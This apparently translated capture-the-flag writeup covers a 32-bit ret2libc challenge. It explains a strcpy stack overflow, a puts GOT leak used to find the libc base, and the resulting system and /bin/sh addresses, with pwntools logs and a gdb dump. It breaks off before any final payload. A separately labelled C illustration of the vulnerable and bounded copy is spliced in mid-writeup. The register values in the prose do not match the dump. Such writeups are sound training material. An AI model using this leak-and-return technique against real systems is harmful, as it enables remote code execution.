1. Challenge information
Challenge download link: https://pan.baidu.com/s/1wk3JFQBHgVZ0vjfnQk60Ug  Extraction code: 0000
2. Solution analysis
Compared with the previous two worked examples the difficulty rises considerably: the program contains neither the address of the system function nor a /bin/sh string, so we have to use the system function and the /bin/sh string that live inside libc. The challenge supplies the libc version, so what we need is to leak the address of some libc function. In fact most challenges require us to obtain the address of system ourselves. This is usually done through libc's lazy binding mechanism: leak the address of a function that has already been executed (and has therefore been resolved), and because the relative offsets between functions inside libc are fixed, that one address determines all the others. Sometimes it is also necessary to return to main or another function so that a payload can be constructed and used more than once.
2.1 First, check which security protections the program has enabled
root@pwn_test1604:/ctf/work/wolf/ret2libc# checksec ret2libc3
[*] '/ctf/work/wolf/ret2libc/ret2libc3'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
root@pwn_test1604:/ctf/work/wolf/ret2libc#
The program is a 32-bit little-endian binary with NX enabled; there is no stack canary and no PIE, so the binary's own addresses are fixed.
2.2 Next, inspect the program in IDA
2.3 The main function itself does not overflow, but there are two suspicious functions; step into them and take a look.
The string copy in Print_message has a stack overflow: from main we can see that the src string can be up to 256 bytes long, far more than 56. Since the offsets between function addresses inside libc are fixed, leaking the real address of one function and subtracting that function's offset within libc gives the base address at which libc is loaded into memory, and from that the addresses of system and /bin/sh can be calculated.
2.4 Use gdb to determine how many bytes the string s lies below ebp
Dynamic debugging
After stepping into Print_message and letting strcpy execute, observe the stack frame: eax holds the address 0xffffcfe0 and ebp is 0xffffd018.
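As an added illustration (not code from the challenge binary or from this writeup), here is the strcpy pattern described above next to a bounded version. The 56-byte size comes from the local buffer at ebp - 0x38; the function names and the reject-oversize-input policy are my assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* Buffer size taken from the disassembly: the local buffer sits at
 * ebp - 0x38, i.e. 56 bytes below the saved frame pointer. */
#define MSG_BUF_SIZE 56

/* The pattern the writeup identifies: an unbounded strcpy from a
 * caller-controlled string into a 56-byte stack buffer. Anything longer
 * than 55 characters overwrites the saved ebp and the return address.
 * Shown only to make the shape of the bug visible; not exercised by
 * the tests below. */
void print_message_vulnerable(const char *src)
{
    char s[MSG_BUF_SIZE];
    strcpy(s, src);                 /* no length check at all */
    printf("Leave some message for me :%s\n", s);
}

/* Hardened variant (assumption: the program only needs to echo the
 * message, so refusing oversize input is acceptable). Returns 0 on
 * success and -1 if the message plus its NUL would not fit. memchr
 * stops at the first match, so it never reads past the terminator. */
int print_message_checked(const char *src)
{
    char s[MSG_BUF_SIZE];
    const char *nul = memchr(src, '\0', MSG_BUF_SIZE);
    if (nul == NULL) {
        return -1;                  /* no terminator within 56 bytes */
    }
    size_t len = (size_t)(nul - src);
    memcpy(s, src, len + 1);        /* copies the NUL as well */
    printf("Leave some message for me :%s\n", s);
    return 0;
}

/* Test helper: builds a constructed message of n 'A' characters and
 * feeds it to the checked function; returns its status. */
int check_message_len(size_t n)
{
    char *buf = malloc(n + 1);
    if (buf == NULL) return -1;
    memset(buf, 'A', n);
    buf[n] = '\0';
    int rc = print_message_checked(buf);
    free(buf);
    return rc;
}
```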
Left pane (output of the pwntools script):
set $_base = 0x8048000
[*] running in new terminal: /usr/bin/gdb -q "./ret2libc3" 937 -x "/tmp/pwn30PHCO.gdb"
[DEBUG] Launching a new terminal: ['/usr/bin/tmux', 'sp', '-h', '/usr/bin/gdb -q "./ret2libc3" 937 -x "/tmp/pwn30PHCO.gdb"']
[+] Waiting for debugger: Done
[DEBUG] PLT 0x80483b0 read
[DEBUG] PLT 0x80483c0 printf
[DEBUG] PLT 0x80483d0 fflush
[DEBUG] PLT 0x80483e0 strcpy
[DEBUG] PLT 0x80483f0 puts
[DEBUG] PLT 0x8048400 __gmon_start__
[DEBUG] PLT 0x8048410 __libc_start_main
[DEBUG] PLT 0x8048420 strtol
[DEBUG] PLT 0x176b0 _Unwind_Find_FDE
[DEBUG] PLT 0x176c0 realloc
[DEBUG] PLT 0x176e0 memalign
[DEBUG] PLT 0x17710 _dl_find_dso_for_object
[DEBUG] PLT 0x17720 calloc
[DEBUG] PLT 0x17730 ___tls_get_addr
[DEBUG] PLT 0x17740 malloc
[DEBUG] PLT 0x17748 free
[*] '/lib/i386-linux-gnu/libc.so.6'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[DEBUG] Received 0xa0 bytes:
    '###############################\n'
    'Do you know return to library ?\n'
    '###############################\n'
    'What do you want to see in memory?\n'
    'Give me an address (in dec) :'
[DEBUG] Sent 0xa bytes:
    '134520860\n'
[DEBUG] Received 0x28 bytes:
    'The content of the address : 0xf7d9fca0\n'
[*] puts_addr: 0xf7d9fca0
[DEBUG] Received 0x1b bytes:
    'Leave some message for me :'
[DEBUG] Sent 0x49 bytes:

Right pane (gdb, stopped at the breakpoint in Print_message):
Starting program: /ctf/work/wolf/ret2libc/ret2libc3
###############################
Do you know return to library ?
###############################
What do you want to see in memory?
Give me an address (in dec) :134520860
The content of the address : 0xf7e72ca0
Leave some message for me :0xf7d9fca0

Breakpoint 1, 0x08048556 in Print_message ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
──────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────
 EAX  0xffffd5a2 ◂— 0x37667830 ('0xf7')
 EBX  0x0
 ECX  0xffffd5a2 ◂— 0x37667830 ('0xf7')
 EDX  0x100
 EDI  0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
 ESI  0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
 EBP  0xffffd588 —▸ 0xffffd6b8 ◂— 0x0
 ESP  0xffffd540 —▸ 0xf7fc5d60 (_IO_2_1_stdout_) ◂— 0xfbad2a84
 EIP  0x8048556 (Print_message+6) ◂— mov eax, dword ptr [ebp + 8]
───────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────────
 ► 0x8048556 <Print_message+6>     mov    eax, dword ptr [ebp + 8]
   0x8048559 <Print_message+9>     mov    dword ptr [esp + 4], eax
   0x804855d <Print_message+13>    lea    eax, [ebp - 0x38]
   0x8048560 <Print_message+16>    mov    dword ptr [esp], eax
   0x8048563 <Print_message+19>    call   strcpy@plt <0x80483e0>

   0x8048568 <Print_message+24>    lea    eax, [ebp - 0x38]
   0x804856b <Print_message+27>    mov    dword ptr [esp + 4], eax
   0x804856f <Print_message+31>    mov    dword ptr [esp], 0x8048721
   0x8048576 <Print_message+38>    call   printf@plt <0x80483c0>

   0x804857b <Print_message+43>    leave
   0x804857c <Print_message+44>    ret
────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────
00:0000│ esp  0xffffd540 —▸ 0xf7fc5d60 (_IO_2_1_stdout_) ◂— 0xfbad2a84
01:0004│      0xffffd544 —▸ 0x804b008 ◂— 'Leave some message for me :: 0xf7e72ca0\n'
02:0008│      0xffffd548 ◂— 0x1b
03:000c│      0xffffd54c ◂— 0x0